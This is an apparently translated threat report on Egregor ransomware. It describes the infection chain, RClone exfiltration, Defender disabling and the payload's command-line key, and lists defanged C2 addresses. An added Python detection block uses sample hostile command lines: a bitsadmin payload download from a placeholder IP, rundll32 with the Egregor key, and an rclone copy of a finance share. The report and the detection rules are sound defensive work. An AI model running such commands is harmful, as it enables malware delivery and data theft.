Egregor Ransomware

About Egregor Ransomware

Egregor is a ransomware variant that was first discovered in September 2020. Several attacks attributed to it have recently been identified, targeting companies around the world, including the gaming giants Crytek and Ubisoft.

Like the extortion-oriented Maze ransomware, Egregor attacks steal the target's data, store it on a remote server, and then encrypt the data on the victim's machine. Egregor is probably the most aggressive ransomware family in terms of its negotiations with victims.

The attacker gives the victim only 72 hours to respond. If the ransom is not paid, the data is published on the attacker's website, "Egregor News".

Ransom payments are negotiated and agreed through a dedicated chat feature provided for each victim, and are made in Bitcoin.

[Figure] Data published on the website "Egregor News"

Egregor is believed to be related to another ransomware, Sekhmet, which appeared in March 2020. Sekhmet shares many similarities with Egregor, and some with Maze.

Egregor is still largely a mystery in terms of how its attacks are delivered and who is behind them, and no detailed information is available at this time. However, since Maze announced its shutdown in late October, Egregor is speculated to be its "successor". This assumption is based on the closeness between the two and, of course, the timing of the shift.

Key findings

· New threat: Egregor ransomware has caused great damage in a short period of time and has dominated news headlines around the world.

· High severity: Cybereason's Nocturnus team rates Egregor's threat level as "high" because of the destructive power of its attacks.

· Slow infiltration: Before deploying the ransomware, the attackers infiltrate the organization and move laterally within it before attempting a full-fledged hacking operation.

· Delivery through commodity malware: Commodity malware appears to be the source of infection. Based on preliminary reconnaissance of the stolen data sent to the C2 server, the attackers escalate to an interactive hacking operation, eventually causing a large number of ransomware infections.

· Detection and Defense : The Cybereason Defense Platform fully detects and defends against Egregor ransomware.

EGREGOR attack flow

[Figure] Egregor infection chain

From Commodity Malware Infection to Ransomware

Since Egregor is relatively recent malware, this report covers only a limited number of Egregor-related incidents, including information about the infection chain, and does not provide a detailed explanation.

The information obtained so far suggests that the initial infection begins with a phishing email carrying a file with malicious macro code embedded in it.

The macro code downloads the Qbot, IcedID, or Ursnif commodity malware. This technique of using commodity malware for the initial infection and ultimately delivering ransomware has previously been observed with Ryuk ransomware and Maze.

Later in the attack, once a Cobalt Strike beacon is installed on the infected machine, the attack transitions to interactive hacking activity. The attackers use reconnaissance tools such as AdFind and SharpHound to gather information about users, groups, computers, and more. This information is also used during the lateral movement stage, allowing the Egregor operators to abuse Active Directory to elevate privileges and become domain administrator.

At this stage, once the malware is installed on the victim's machine, it begins communicating with the C2 server, and additional components are downloaded, including scripts, DLLs, and other files used to exfiltrate data and encrypt files.

The downloaded files include the following.

· Batch file: Used to run Bitsadmin and Rundll32 to download and run the Egregor payload.

· Zip file: Contains an RClone client binary (renamed svchost) and RClone configuration files (webdav, ftp, dropbox) that are used later for data exfiltration.

[Figure] VT screenshot of the RClone executable and config file

Cobalt Strike creates a service that executes encrypted PowerShell commands and runs shellcode that connects to amazjai-technologies[.]industry.

[Figure] Shellcode decryption

After downloading the files needed for the attack, the attacker "prepares" the environment and takes the final steps to evade detection and defense by security features.

A Group Policy Object (GPO) is created to disable Windows Defender, and an attempt is made to disable any other antivirus product.

Run EGREGOR

As mentioned earlier, the Egregor attackers deploy the ransomware payload after collecting sensitive information and configuring a GPO to evade detection and protection by security features. To deploy the ransomware, they run the downloaded batch file, which downloads and runs the ransomware payload from a remote server.

[Figure] Contents of the batch file

The Egregor payload can only be decrypted if the correct key is provided in the command-line arguments to the Rundll32 process. Therefore, the file cannot be analyzed, either manually or in a sandbox, unless the exact command line that the attacker used to run the ransomware is supplied.

To execute the ransomware and decrypt the code blobs inside it, the attacker supplies the key "-passegregor 10" in the batch file; with this key the ransomware runs and encrypts files.
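As an added example (not code from this report or from Cybereason), the following Python rules flag the execution behaviours described above over constructed process-creation events: rundll32 launched with the -passegregor key, Bitsadmin downloads started from a batch script, and a svchost.exe running outside System32 standing in for the renamed RClone client. The paths, command lines, DLL name and IP address are constructed sample data, not indicators from the report.

```python
import re

# Constructed process-creation events (image, command line, parent); not report telemetry.
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\Temp\\payload.dll,Entry -passegregor 10",
     "parent": "C:\\Windows\\System32\\cmd.exe"},
    {"image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job http://203.0.113.5/payload.dll C:\\Windows\\Temp\\payload.dll",
     "parent": "C:\\Windows\\System32\\cmd.exe"},
    {"image": "C:\\Users\\Public\\svchost.exe",  # renamed RClone dropped by the attacker
     "cmdline": "svchost.exe copy C:\\Share\\Finance remote:backup --config rclone.conf",
     "parent": "C:\\Windows\\System32\\cmd.exe"},
    {"image": "C:\\Windows\\System32\\svchost.exe",  # legitimate service host, must not fire
     "cmdline": "svchost.exe -k netsvcs -p",
     "parent": "C:\\Windows\\System32\\services.exe"},
]


def match_rules(event):
    """Return the names of the detection rules that fire for one event."""
    hits = []
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    parent = event["parent"].lower()
    name = image.rsplit("\\", 1)[-1]
    # Rule 1: the Egregor DLL only runs when its key is passed on the rundll32 command line.
    if name == "rundll32.exe" and "-passegregor" in cmd:
        hits.append("egregor_rundll32_key")
    # Rule 2: Bitsadmin transfer launched by a script interpreter (cmd.exe parent).
    if name == "bitsadmin.exe" and "/transfer" in cmd and parent.endswith("\\cmd.exe"):
        hits.append("bitsadmin_download_from_script")
    # Rule 3: svchost.exe outside System32 or not started by services.exe (masquerading binary).
    in_system32 = image.startswith("c:\\windows\\system32\\")
    if name == "svchost.exe" and (not in_system32 or not parent.endswith("\\services.exe")):
        hits.append("svchost_masquerade")
    # Rule 4: RClone configuration or binary name on any command line (exfiltration tooling).
    if re.search(r"\brclone\b", cmd):
        hits.append("rclone_exfil_tooling")
    return hits


def scan(events):
    """Return (image, rule names) for every event that triggers at least one rule."""
    results = []
    for event in events:
        hits = match_rules(event)
        if hits:
            results.append((event["image"], hits))
    return results
```

The legitimate svchost.exe in the last event produces no hit, which is the check to keep when tuning rule 3 against real telemetry.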

[Figure] Execution of the batch file as shown in the Cybereason Defense Platform

Each encrypted file gets a random string appended as a new extension. For example, "My_files.zip" is renamed to "My_files.zip.IAsnM" and "My_files2.zip" to "My_files2.zip.WZlF". The attacker also drops a ransom note named "recover-files.txt" in every folder that contains encrypted files, as shown below.

[Figure] Encrypted files

[Figure] Message to the user

What SEKHMET and MAZE have in common

Egregor's code resembles that of the infamous Maze and Sekhmet ransomware. In addition to code similarities, the three ransomware families have a lot in common in terms of behavior and features.

| | Maze | Sekhmet | Egregor |
| --- | --- | --- | --- |
| First discovery | May 2019 | March 2020 | July 2020 |
| File type | DLL/EXE | ETC | ETC |
| Encrypted file extension | Random characters appended to the file name | Random characters appended to the file name | Random characters appended to the file name |
| Cryptographic algorithm | ChaCha and RSA | ChaCha and RSA | ChaCha and RSA |
| Ransom note file name | DECRYPT-FILES.txt | RECOVER-FILES.txt | RECOVER-FILES.txt |
| Impact | Encryption and extortion | Encryption and extortion | Encryption and extortion |
| Contact with the criminals | Tor website | Tor website | Tor website |
| Leak website | Maze News | Leaks, Leaks, Leaks | Egregor News |

Another way to look for commonalities among the three malware families is to examine their infrastructure. Various binaries, zip files, and scripts were found hosted at the IP address 185.238.0[.]233:

· Maze ransomware binaries

· Egregor ransomware binaries

· Zip file containing the RClone binary and configuration file

The IP address is referenced by various scripts, such as a batch file that downloads the Egregor payload.

[Figure] Chart showing the various samples found on 185.238.0[.]233

The similarities among the three ransom notes are also noteworthy. They have a very similar structure, and some sections appear to have been copy-pasted.

[Figure] Comparison of the ransom notes of the three ransomware families

The Maze and Egregor binaries are not the only samples found on this particular server. Other samples related to ProLock ransomware were also found there, as analyzed in this report.

IOCs
